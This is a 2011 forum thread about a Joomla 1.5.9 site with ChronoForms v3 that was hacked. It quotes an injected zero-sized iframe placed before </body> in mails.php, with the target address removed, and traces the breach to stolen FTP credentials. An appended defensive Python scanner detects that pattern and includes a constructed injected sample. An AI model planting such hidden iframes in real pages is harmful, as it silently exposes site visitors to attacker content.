Site hacked

mekon 01 Jul, 2011
Hi, one of the sites I have that uses chrono has been hacked.
All of the index.html files have been modified and at the end of the code an iframe has been entered.

However I also noticed that in com_chronocontact/libraries/mails.php there is also this code.

<head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">
<base href=\"".JURI::base()."/\" />
<title>Email</title>
</head>

<body>$email_body<iframe src="THE_ADDRESS_TO_THE_WEB_PAGE_WAS_HERE" width="0" height="0"></iframe></body>
</html>


I have v3 installed on a Windows server.
The Joomla version is 1.5.9

Can you tell me if v3 is vulnerable?

Thanks for the advice

M
GreyHead 01 Jul, 2011
Hi Mekon,

I don't know of any particular vulnerabilities in ChronoForms v3 - but there certainly are in Joomla! 1.5.9.

In this case it looks as though the hack was a search and replace on </body> including the one in the mails.php file.

Bob
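
A defensive check for the pattern described above, as an added example that is not part of the original thread or of ChronoForms: it walks a web root and reports files where a zero-width or zero-height iframe sits directly before </body>. The function names, the file suffixes and the sample strings are assumptions constructed for illustration.

```python
import re
import sys
from pathlib import Path

# An empty iframe sitting directly before </body>, as in the thread's mails.php snippet.
IFRAME_BEFORE_BODY = re.compile(
    r"<iframe\b(?P<attrs>[^>]*)>\s*</iframe>\s*</body>", re.IGNORECASE)
# width/height equal to 0; the optional backslash covers quotes escaped inside PHP strings.
ZERO_DIM = re.compile(r"""\b(width|height)\s*=\s*\\?["']?0(?:px)?\b""", re.IGNORECASE)
SRC = re.compile(r"""\bsrc\s*=\s*\\?["']([^"'\\]*)""", re.IGNORECASE)


def find_hidden_iframes(text):
    """Return [(line_number, src)] for zero-sized iframes placed right before </body>."""
    hits = []
    for m in IFRAME_BEFORE_BODY.finditer(text):
        attrs = m.group("attrs")
        if ZERO_DIM.search(attrs):
            src = SRC.search(attrs)
            line = text.count("\n", 0, m.start()) + 1
            hits.append((line, src.group(1) if src else ""))
    return hits


def scan_tree(root, suffixes=(".html", ".htm", ".php")):
    """Map each file under root (matching suffixes) to its hits; clean files are omitted."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits = find_hidden_iframes(text)
            if hits:
                report[str(path)] = hits
    return report


# Constructed samples: a legitimate visible embed and an injected zero-sized one.
SAMPLE_CLEAN = ('<html>\n<body>\n<iframe src="https://video.example/embed" '
                'width="560" height="315"></iframe>\n</body>\n</html>\n')
SAMPLE_INJECTED = ('<html>\n<body>$email_body<iframe src="http://placeholder.invalid/" '
                   'width="0" height="0"></iframe></body>\n</html>\n')

if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE_INJECTED))
    for name, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for line, src in hits:
            print(f"{name}:{line}: hidden iframe -> {src}")
```

Matches are candidates to compare against a known-good copy of each file, since a legitimate page can occasionally contain a zero-sized iframe.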
mekon 01 Jul, 2011
Thanks

I've just found out that someone's computer had a virus on their computer; the person had control panel / FTP details saved in their Windows passwords.

Not just a Joomla site affected.